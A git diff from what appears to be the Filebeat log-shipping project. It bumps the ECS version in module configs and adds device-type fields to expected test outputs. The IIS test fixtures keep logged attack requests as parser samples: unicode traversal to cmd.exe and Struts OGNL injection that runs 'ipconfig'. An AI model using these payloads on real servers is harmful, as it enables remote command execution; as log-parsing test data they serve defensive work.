a/filebeat/module/elasticsearch/audit/config/audit.yml b/filebeat/module/elasticsearch/audit/config/audit.yml index bdf1cf8696e..8df82146c8e 100644 --- a/filebeat/module/elasticsearch/audit/config/audit.yml +++ b/filebeat/module/elasticsearch/audit/config/audit.yml @@ -10,7 +10,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - if: regexp: message: "^{" diff --git a/filebeat/module/elasticsearch/deprecation/config/log.yml b/filebeat/module/elasticsearch/deprecation/config/log.yml index 62e291e30de..5381e6a5674 100644 --- a/filebeat/module/elasticsearch/deprecation/config/log.yml +++ b/filebeat/module/elasticsearch/deprecation/config/log.yml @@ -15,4 +15,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/elasticsearch/gc/config/gc.yml b/filebeat/module/elasticsearch/gc/config/gc.yml index ba6d4dceefd..d52a54792c0 100644 --- a/filebeat/module/elasticsearch/gc/config/gc.yml +++ b/filebeat/module/elasticsearch/gc/config/gc.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/elasticsearch/server/config/log.yml b/filebeat/module/elasticsearch/server/config/log.yml index 1723c9c86b6..3edfd48e9eb 100644 --- a/filebeat/module/elasticsearch/server/config/log.yml +++ b/filebeat/module/elasticsearch/server/config/log.yml @@ -15,4 +15,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/elasticsearch/slowlog/config/slowlog.yml b/filebeat/module/elasticsearch/slowlog/config/slowlog.yml index 6b57b280a25..c3c709d8c4b 100644 --- a/filebeat/module/elasticsearch/slowlog/config/slowlog.yml +++ b/filebeat/module/elasticsearch/slowlog/config/slowlog.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/haproxy/log/config/file.yml b/filebeat/module/haproxy/log/config/file.yml index 1fc1e5a33c7..759bd4ed456 100644 --- a/filebeat/module/haproxy/log/config/file.yml +++ b/filebeat/module/haproxy/log/config/file.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/haproxy/log/config/syslog.yml b/filebeat/module/haproxy/log/config/syslog.yml index cf755c53a96..8634a5b6283 100644 --- a/filebeat/module/haproxy/log/config/syslog.yml +++ b/filebeat/module/haproxy/log/config/syslog.yml @@ -4,6 +4,6 @@ protocol.udp: processors: - add_locale: ~ - add_fields: - target: '' + target: "" fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/icinga/debug/config/debug.yml b/filebeat/module/icinga/debug/config/debug.yml index 34bdcef7fa8..8c11e01e7ea 100644 --- a/filebeat/module/icinga/debug/config/debug.yml +++ b/filebeat/module/icinga/debug/config/debug.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/icinga/main/config/main.yml b/filebeat/module/icinga/main/config/main.yml index 34bdcef7fa8..8c11e01e7ea 100644 --- a/filebeat/module/icinga/main/config/main.yml +++ b/filebeat/module/icinga/main/config/main.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/icinga/startup/config/startup.yml b/filebeat/module/icinga/startup/config/startup.yml index 81a45be7e91..39bf7703cc4 100644 --- a/filebeat/module/icinga/startup/config/startup.yml +++ b/filebeat/module/icinga/startup/config/startup.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/iis/access/config/iis-access.yml b/filebeat/module/iis/access/config/iis-access.yml index aadbabb01ed..40e87d30ee0 100644 --- a/filebeat/module/iis/access/config/iis-access.yml +++ b/filebeat/module/iis/access/config/iis-access.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/iis/access/test/test-iis-7.2.log-expected.json b/filebeat/module/iis/access/test/test-iis-7.2.log-expected.json index 64ad587bb8b..7b21735e4d4 100644 --- a/filebeat/module/iis/access/test/test-iis-7.2.log-expected.json +++ b/filebeat/module/iis/access/test/test-iis-7.2.log-expected.json @@ -33,6 +33,7 @@ "url.path": "/pbserver/..\u00c0\u00af..\u00c0\u00af..\u00c0\u00af..\u00c0\u00af..\u00c0\u00af../winnt/system32/cmd.exe", "url.query": "/c+dir+c:\\+/OG", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", @@ -74,6 +75,7 @@ "url.path": "/pbserver/..\u00c1\u00c1..\u00c1\u00c1..\u00c1\u00c1..\u00c1\u00c1..\u00c1\u00c1../winnt/system32/cmd.exe", "url.query": "/c+dir+c:\\+/OG", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", @@ -114,6 +116,7 @@ "source.ip": "10.50.6.188", "url.path": "/Director", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", @@ -154,6 +157,7 @@ "source.ip": "10.50.6.188", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", @@ -195,6 +199,7 @@ "url.path": "/pbserver/..\u00c1\u0153..\u00c1\u0153..\u00c1\u0153..\u00c1\u0153..\u00c1\u0153../winnt/system32/cmd.exe", "url.query": "/c+dir+c:\\+/OG", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", diff --git a/filebeat/module/iis/access/test/test-iis-7.5.log-expected.json b/filebeat/module/iis/access/test/test-iis-7.5.log-expected.json index 95210536925..c8e10677d3d 100644 --- a/filebeat/module/iis/access/test/test-iis-7.5.log-expected.json +++ b/filebeat/module/iis/access/test/test-iis-7.5.log-expected.json @@ -32,6 +32,7 @@ "source.ip": "10.100.118.31", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR[ 2.0.50727](tel: 2050727); .NET CLR 3.0.30729)", "user_agent.os.full": "Windows 8.1", diff --git a/filebeat/module/iis/access/test/test-ipv6zone.log-expected.json b/filebeat/module/iis/access/test/test-ipv6zone.log-expected.json index c3f4a4932da..c3c1a14a05e 100644 --- a/filebeat/module/iis/access/test/test-ipv6zone.log-expected.json +++ b/filebeat/module/iis/access/test/test-ipv6zone.log-expected.json @@ -38,6 +38,7 @@ "source.ip": "::1", "url.path": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.0", diff --git a/filebeat/module/iis/access/test/test-x-forward-for-extended.log-expected.json b/filebeat/module/iis/access/test/test-x-forward-for-extended.log-expected.json index 565bdfca17d..fa825003cd4 100644 --- a/filebeat/module/iis/access/test/test-x-forward-for-extended.log-expected.json +++ b/filebeat/module/iis/access/test/test-x-forward-for-extended.log-expected.json @@ -40,6 +40,7 @@ "source.ip": "10.24.136.240", "url.path": "/favicon.ico", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0", "user_agent.os.full": "Windows 10", @@ -87,6 +88,7 @@ "source.ip": "10.24.136.240", "url.path": "/robots.txt", "user_agent.device.name": "Spider", + "user_agent.device.type": "Robot", "user_agent.name": "Twitterbot", "user_agent.original": "Twitterbot/1.0", "user_agent.version": "1.0" @@ -134,6 +136,7 @@ "url.path": "/app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg", "url.query": "width=35&height=38&mode=crop", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Edge", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362", "user_agent.os.full": "Windows 10", @@ -184,6 +187,7 @@ "url.path": "/app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg", "url.query": "width=75&height=40&mode=crop", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Edge", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362", "user_agent.os.full": "Windows 10", @@ -234,6 +238,7 @@ "url.path": "/Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png", "url.query": "width=60&height=20&mode=crop", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Mobile Safari", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1", "user_agent.os.full": "iOS 13.7", @@ -284,6 +289,7 @@ "url.path": "/Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg", "url.query": "width=60&height=20&mode=crop", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Mobile Safari", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1", "user_agent.os.full": "iOS 13.7", diff --git a/filebeat/module/iis/access/test/test-x-forward-for.log-expected.json b/filebeat/module/iis/access/test/test-x-forward-for.log-expected.json index 4d8ace5a7fb..7acf700509e 100644 --- a/filebeat/module/iis/access/test/test-x-forward-for.log-expected.json +++ b/filebeat/module/iis/access/test/test-x-forward-for.log-expected.json @@ -34,6 +34,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -76,6 +77,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -118,6 +120,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -161,6 +164,7 @@ "url.path": "/Production-UI/data/finance/legacy/GLAPAprvMaster", "url.query": "$filter=BatchId%20eq%20%27FY21HSNG0820%27&$orderby=Subsys,Ref&$skip=0&$top=20", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -204,6 +208,7 @@ "url.path": "/Production-UI/data/finance/legacy/GLATrnsDetail", "url.query": "$filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27&$orderby=RecNo&$skip=0&$top=20", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -246,6 +251,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -288,6 +294,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -330,6 +337,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -372,6 +380,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/documents/attachDoc", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", diff --git a/filebeat/module/iis/access/test/test.log-expected.json b/filebeat/module/iis/access/test/test.log-expected.json index 786333c1379..59a6d13d4bc 100644 --- a/filebeat/module/iis/access/test/test.log-expected.json +++ b/filebeat/module/iis/access/test/test.log-expected.json @@ -43,6 +43,7 @@ "url.path": "/", "url.query": "q=100", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0", "user_agent.os.full": "Windows 7", @@ -80,6 +81,7 @@ "source.ip": "127.0.0.1", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0", "user_agent.os.full": "Windows 7", @@ -136,6 +138,7 @@ "source.ip": "85.181.35.98", "url.path": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.0", @@ -177,6 +180,7 @@ "url.path": "/", "url.query": "redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()}", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", @@ -217,6 +221,7 @@ "source.ip": "10.50.6.188", "url.path": "/${#context['xwork.MethodAccessor.denyMethodExecution']=!(#_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()}.action", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", diff --git a/filebeat/module/iis/error/config/iis-error.yml b/filebeat/module/iis/error/config/iis-error.yml index aadbabb01ed..40e87d30ee0 100644 --- a/filebeat/module/iis/error/config/iis-error.yml +++ b/filebeat/module/iis/error/config/iis-error.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/kafka/log/config/log.yml b/filebeat/module/kafka/log/config/log.yml index 87f38b44128..94c705c484a 100644 --- a/filebeat/module/kafka/log/config/log.yml +++ b/filebeat/module/kafka/log/config/log.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/kibana/audit/config/audit.yml b/filebeat/module/kibana/audit/config/audit.yml index 3806e65aaba..bac90dfba5b 100644 --- a/filebeat/module/kibana/audit/config/audit.yml +++ b/filebeat/module/kibana/audit/config/audit.yml @@ -10,7 +10,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 0.0.0 + ecs.version: 1.9.0 - decode_json_fields: fields: [message] target: kibana._audit_temp diff --git a/filebeat/module/kibana/log/config/log.yml b/filebeat/module/kibana/log/config/log.yml index a1c113f53a8..6bc146d18a8 100644 --- a/filebeat/module/kibana/log/config/log.yml +++ b/filebeat/module/kibana/log/config/log.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/logstash/log/config/log.yml b/filebeat/module/logstash/log/config/log.yml index a90a5be8d96..79154da3464 100644 --- a/filebeat/module/logstash/log/config/log.yml +++ b/filebeat/module/logstash/log/config/log.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/logstash/slowlog/config/slowlog.yml b/filebeat/module/logstash/slowlog/config/slowlog.yml index f391047702d..4694e21b679 100644 --- a/filebeat/module/logstash/slowlog/config/slowlog.yml +++ b/filebeat/module/logstash/slowlog/config/slowlog.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/mongodb/log/config/log.yml b/filebeat/module/mongodb/log/config/log.yml index 2db4213af7b..100ae74fadc 100644 --- a/filebeat/module/mongodb/log/config/log.yml +++ b/filebeat/module/mongodb/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/mysql/error/config/error.yml b/filebeat/module/mysql/error/config/error.yml index 2bf22a084ec..03eb867033b 100644 --- a/filebeat/module/mysql/error/config/error.yml +++ b/filebeat/module/mysql/error/config/error.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/mysql/slowlog/config/slowlog.yml b/filebeat/module/mysql/slowlog/config/slowlog.yml index 6b83b522706..c10dd58a561 100644 --- a/filebeat/module/mysql/slowlog/config/slowlog.yml +++ b/filebeat/module/mysql/slowlog/config/slowlog.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/nats/log/config/log.yml b/filebeat/module/nats/log/config/log.yml index 2db4213af7b..100ae74fadc 100644 --- a/filebeat/module/nats/log/config/log.yml +++ b/filebeat/module/nats/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/nginx/access/config/nginx-access.yml b/filebeat/module/nginx/access/config/nginx-access.yml index 2bd2a117d1c..a33bd9b635e 100644 --- a/filebeat/module/nginx/access/config/nginx-access.yml +++ b/filebeat/module/nginx/access/config/nginx-access.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/nginx/access/test/access.log-expected.json b/filebeat/module/nginx/access/test/access.log-expected.json index 7981a316c95..a54a5d52ebf 100644 --- a/filebeat/module/nginx/access/test/access.log-expected.json +++ b/filebeat/module/nginx/access/test/access.log-expected.json @@ -40,6 +40,7 @@ "source.ip": "77.179.66.156", "url.original": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -89,6 +90,7 @@ "source.ip": "77.179.66.156", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -137,6 +139,7 @@ "source.ip": "77.179.66.156", "url.original": "/adsasd", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -185,6 +188,7 @@ "source.ip": "77.179.66.156", "url.original": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -234,6 +238,7 @@ "source.ip": "77.179.66.156", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -282,6 +287,7 @@ "source.ip": "77.179.66.156", "url.original": "/test", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -330,6 +336,7 @@ "source.ip": "77.179.66.156", "url.original": "/test", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -378,6 +385,7 @@ "source.ip": "77.179.66.156", "url.original": "/test1", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -416,6 +424,7 @@ "source.ip": "127.0.0.1", "url.original": "/test1", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -454,6 +463,7 @@ "source.ip": "127.0.0.1", "url.original": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", @@ -492,6 +502,7 @@ "source.ip": "127.0.0.1", "url.original": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", @@ -530,6 +541,7 @@ "source.ip": "127.0.0.1", "url.original": "/taga", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", diff --git a/filebeat/module/nginx/access/test/test-with-host.log-expected.json b/filebeat/module/nginx/access/test/test-with-host.log-expected.json index e07836ce520..3681593b21f 100644 --- a/filebeat/module/nginx/access/test/test-with-host.log-expected.json +++ b/filebeat/module/nginx/access/test/test-with-host.log-expected.json @@ -33,6 +33,7 @@ "source.ip": "10.0.0.2", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", @@ -72,6 +73,7 @@ "source.ip": "172.17.0.1", "url.original": "/stringpatch", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", @@ -123,6 +125,7 @@ "source.ip": "85.181.35.98", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", @@ -173,6 +176,7 @@ "source.ip": "85.181.35.98", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.0", @@ -226,6 +230,7 @@ "source.ip": "199.96.1.1", "url.original": "/assets/xxxx?q=100", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Amazon CloudFront" }, @@ -269,6 +274,7 @@ "source.ip": "2a03:0000:10ff:f00f:0000:0000:0:8000", "url.original": "/test.html", "user_agent.device.name": "Spider", + "user_agent.device.type": "Robot", "user_agent.name": "Facebot", "user_agent.original": "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)", "user_agent.version": "1.0" @@ -358,6 +364,7 @@ "source.address": "localhost", "url.original": "/test2", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", @@ -394,6 +401,7 @@ "source.address": "localhost", "url.original": "/test2", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", diff --git a/filebeat/module/nginx/access/test/test.log-expected.json b/filebeat/module/nginx/access/test/test.log-expected.json index b27c9ccf19b..2f5e1a7f9cc 100644 --- a/filebeat/module/nginx/access/test/test.log-expected.json +++ b/filebeat/module/nginx/access/test/test.log-expected.json @@ -32,6 +32,7 @@ "source.ip": "10.0.0.2", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 